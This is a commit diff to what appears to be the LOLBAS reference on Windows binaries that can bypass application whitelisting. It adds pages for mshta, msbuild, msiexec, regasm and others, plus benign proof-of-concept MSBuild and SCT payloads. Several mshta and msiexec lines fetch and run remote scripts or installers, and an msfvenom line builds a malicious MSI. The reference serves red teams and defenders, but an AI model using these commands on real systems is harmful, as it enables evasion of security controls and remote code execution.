Added some more adjustments

OSBinaries/Msbuild.md

@@ -3,11 +3,38 @@
 * Functions: Execute
 
 ```
-msbuild.exe pshell.xml
+msbuild.exe pshell.xml   
+    
+msbuild.exe Msbuild.csproj    
 ```
   
 Acknowledgements:
 * Casey Smith - @subtee
+* Cn33liz - @Cneelis
   
-  
+Code sample:
+* [Msbuild.csproj](Payload/Msbuild.csproj) 
+
+Resources:
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
+* https://github.com/Cn33liz/MSBuildShell
+* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+
+Full path:
+```
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
+C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
+C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
+C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
+```
+
+Notes:
+Example code borrowed from Red Canary - Atomic Red Team.
+
+
+ 
+
   

OSBinaries/Msdt.md

@@ -9,7 +9,19 @@ Open .diagcab package
 Acknowledgements:
 * ?
 
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
 Resources:
 * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/    
 * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/  
  
+
+Full path:
+```
+C:\Windows\System32\Msdt.exe    
+C:\Windows\SysWOW64\Msdt.exe    
+```
+
+Notes:
+

OSBinaries/Mshta.md

@@ -3,8 +3,31 @@
 * Functions: Execute
 
 ```
-mshta.exe evilfile.hta
+mshta.exe evilfile.hta    
+
+mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))    
+
+mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
 ```
 
 Acknowledgements:
-* ?   
+* Casey Smith - @subtee
+
+Code sample:
+* [Mshta_calc.sct](Payload/Mshta_calc.sct)
+
+Resources:
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md      
+* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4     
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct     
+* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/    
+
+Full path:
+```
+C:\Windows\System32\mshta.exe
+C:\Windows\SysWOW64\mshta.exe
+```
+
+Notes:
+SCT code borrowed from Red Canary - Atomic Red Team 
+

OSBinaries/Msiexec.md

@@ -8,4 +8,25 @@ msiexec /q /i http://192.168.100.3/tmp/cmd.png
 ```
 
 Acknowledgements:
-* Casey Smith - @subtee
+* ? - @netbiosX
+
+Code sample:
+* 
+
+Resources:
+* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
+
+Full path:
+```
+c:\windows\system32\msiexec.exe
+c:\windows\sysWOW64\msiexec.exe
+```
+
+Notes:
+Generate MSI file:
+```
+msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi    
+```
+
+
+

OSBinaries/Odbcconf.md

@@ -8,4 +8,22 @@ odbcconf -f file.rsp
 
 Acknowledgements:
 * Casey Smith - @subtee
-* Nick Tyrer - @NickTyrer
+* Nick Tyrer - @NickTyrer
+
+Code sample:
+*
+
+Resources:
+* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b    
+* https://github.com/woanware/application-restriction-bypasses    
+
+Full path:
+```
+c:\windows\system32\odbcconf.exe    
+c:\windows\sysWOW64\odbcconf.exe
+```
+
+Notes:
+Samples can be found in the resources.
+
+ 

OSBinaries/Payload/Msbuild.csproj

@@ -0,0 +1,47 @@
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!-- This inline task executes c# code. -->
+  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
+  <!-- Feel free to use a more aggressive class for testing. -->
+  <Target Name="Hello">
+   <FragmentExample />
+   <ClassExample />
+  </Target>
+  <UsingTask
+    TaskName="FragmentExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <ParameterGroup/>
+    <Task>
+      <Using Namespace="System" />  
+      <Code Type="Fragment" Language="cs">
+        <![CDATA[
+			    Console.WriteLine("Hello From a Code Fragment");		
+        ]]>
+      </Code>
+    </Task>
+	</UsingTask>
+	<UsingTask
+    TaskName="ClassExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+	<Task>
+	<!-- <Reference Include="System.IO" /> Example Include -->		
+      <Code Type="Class" Language="cs">
+        <![CDATA[
+			using System;
+			using Microsoft.Build.Framework;
+			using Microsoft.Build.Utilities;
+				
+			public class ClassExample :  Task, ITask
+			{
+				public override bool Execute()
+				{
+					Console.WriteLine("Hello From a Class.");
+					return true;
+				}
+			}
+        ]]>
+      </Code>
+    </Task>
+  </UsingTask>
+</Project>

OSBinaries/Payload/Mshta_calc.sct

@@ -0,0 +1,43 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

OSBinaries/Presentationhost.md

@@ -7,4 +7,25 @@ Presentationhost.exe C:\temp\Evil.xbap
 ```
 
 Acknowledgements:
-* Casey Smith - @subtee
+* Casey Smith - @subtee
+
+Code sample:
+* 
+
+Resources:
+* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+
+Full path:
+```
+c:\windows\system32\PresentationHost.exe     
+c:\windows\sysWOW64\PresentationHost.exe    
+```
+
+Notes:
+
+
+
+ 
+
+ 

OSBinaries/Regasm.md

@@ -3,10 +3,31 @@
 * Functions: Execute
 
 ```
-regasm.exe /U regsvcs.dll
-
-regasm.exe regsvcs.dll
+regasm.exe /U AllTheThings.dll
 ```
 
 Acknowledgements:
 * Casey Smith - @subtee
+
+Code sample:
+* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
+
+Resources:
+* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+
+Full path:
+```
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
+C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
+```
+
+Notes:
+[1]Code sample linked to Red Canary - Atomic Red Team
+
+
+